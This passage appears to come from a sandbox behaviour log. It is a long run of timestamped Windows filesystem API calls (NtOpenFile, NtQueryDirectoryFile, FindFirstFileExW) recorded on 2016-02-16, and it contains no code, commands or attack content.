"NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": 
"NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": 
